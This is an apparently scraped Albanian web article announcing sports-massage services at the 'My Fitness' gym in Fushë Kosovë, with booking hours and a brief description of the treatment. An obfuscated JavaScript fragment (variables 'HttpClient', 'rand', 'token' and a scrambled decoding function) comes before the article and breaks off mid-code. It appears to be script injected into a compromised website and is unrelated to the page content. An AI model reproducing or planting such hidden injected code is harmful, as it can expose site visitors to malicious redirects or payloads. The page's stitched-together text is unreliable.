;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Palestra “My Fitness” ua prezanton shërbimet e reja që s’duhet t’i lini pa i provuar

By

Palestra “My Fitness” që ndodhet në Fushë Kosovë, sapo e ka përditësuar listën e shërbimeve që ofron, veças hapësirës palestrore.

Kjo palestër duke u munduar që t’i japë edhe më shumë nuanca shërbimit ndaj klientëve, tani ka nisur edhe me shërbimin e Sport Masazhe apo “classic deep”, shërbim ky që jepet nga personeli profesional që ka edhe kualifikime në këtë lëmi.

View this post on Instagram

Masagge Sportive ne My Fitness Rezervo ne numrin 049 116 726 E Hene – E Marte 14:00-22:00

A post shared by My Fitness 24/7 (@myfitness247) on

Përndryshe, nëse po e pyesnit veten se çfarë është Sport Masazhi, ja një shpjegim i thjeshtë, konciz.

Sport Masazhi është manipulimi i shtresave sipërfaqësore dhe të thella të muskujve dhe të indeve lidhore, për të rritur funksionin, relaksimin dhe mirëqenien e trupit tuaj. Po ashtu, përmes këtij masazhi arrihet lirimi i tensionit muskular dhe reduktimi i dhimbjeve dhe ngurtësisë së nyjave.

E nëse jeni nga ata tipa që janë të rregullt në palestër dhe shëndetin fizik e keni të rëndësishëm, Sport Masazh konsiderohet si pjesë e stërvitjes së çdo atleti.

Përmes këtij trajtimi, në mënyrë të veçantë trajtohen këmbët. Kjo ka një shpjegim të thjeshtë. Sepse gjymtyrët e poshtme – pra këmbët – janë në punë gjatë gjithë ditës dhe nëse nuk arrijmë t’i ekuilibrojmë mirë forcat, rrezikohet akumulimi i tensionit në këta muskuj.

Nëse vetëm iu mbush mendja të vizitoni palestrën My Fitness, hidhjani një sy faqes së tyre zyrtare në Instagram dhe pse jo i bëni edhe një ‘follow’.

 

Artikuj të ngjashëm